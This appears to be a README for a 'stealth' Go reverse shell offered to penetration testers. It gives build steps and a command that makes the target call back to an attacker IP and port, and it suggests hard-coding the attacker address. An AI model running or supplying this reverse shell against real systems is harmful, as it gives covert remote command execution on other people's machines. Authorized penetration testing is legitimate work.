This is a stealth GO implementation of a reverse shell. Penetration Testers can use this reverse shell for stealth engagements.
- Enables penetration tester to execture commands on target of evaluation
- Initial Proof of Concept
Go-ReverseShell is implemented in GO programming language
From the root directory open a terminal and type the following command to generate your own binary
go build go-reverseshell.go YouExeName.exe
or
go build go-reverseshell.go
This builds an exe of the same name.
From command prompt/powershell/terminal execute the following binary to call back to your attacker machine
.\go-reverseshell.exe -targetIP="127.0.0.1" -targetPort=4444
if you want to execute the reverse shell without parameters, hard code the attackerIP and port and rebuild: go build go-reverseshell.go
Want to contribute? Great!
Fork, submit a pull request
MIT